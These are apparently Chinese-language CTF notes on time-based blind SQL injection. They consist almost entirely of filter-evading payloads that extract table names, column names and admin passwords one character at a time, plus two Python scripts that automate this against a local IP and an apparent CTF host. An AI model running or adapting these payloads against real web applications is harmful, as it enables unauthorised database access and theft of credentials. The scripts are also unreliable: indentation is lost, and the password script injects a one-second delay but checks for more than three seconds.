一、语句
测试语句:
if(ascii(mid(1,1,1))like(49),sleep(3),1)
1、表:
if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),1,1))like(97),sleep(30),1)
2、列:
if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(0x61646d696e))),1,1))like(105),sleep(30),1)
3、字段
if(ascii(mid((select(group_concat(password))from(admin)),1,1))like(55),sleep(30),1)
二、爆破数据库脚本
import requests
from time import sleep
url = "http://192.168.8.148/sql.php?id="
for i in range(1, 100):
for j in range(32, 128):
payload = "if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)"
res = requests.get(url+payload)
if res.elapsed.total_seconds() > 3:
print(chr(j), end='')
break
'''
数据库
if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)
表名
if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database())))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)
字段名
if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(\"test_sql\")))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)
'''
三、跑密码的脚本
import requests
from time import sleep
url = "http://ctf1-1.anfu.hillstonenet.com:8081/single.php?id="
for i in range(1, 33):
for j in range(47, 128):
if(47<j<58 or 96<j<123):
d = "if(ascii(mid((select(group_concat(password))from(admin))," + str(i) + ",1))like(" + str(j) + "),sleep(1),1)"
r = requests.get(url + d)
if r.elapsed.total_seconds() > 3:
print(chr(j))
break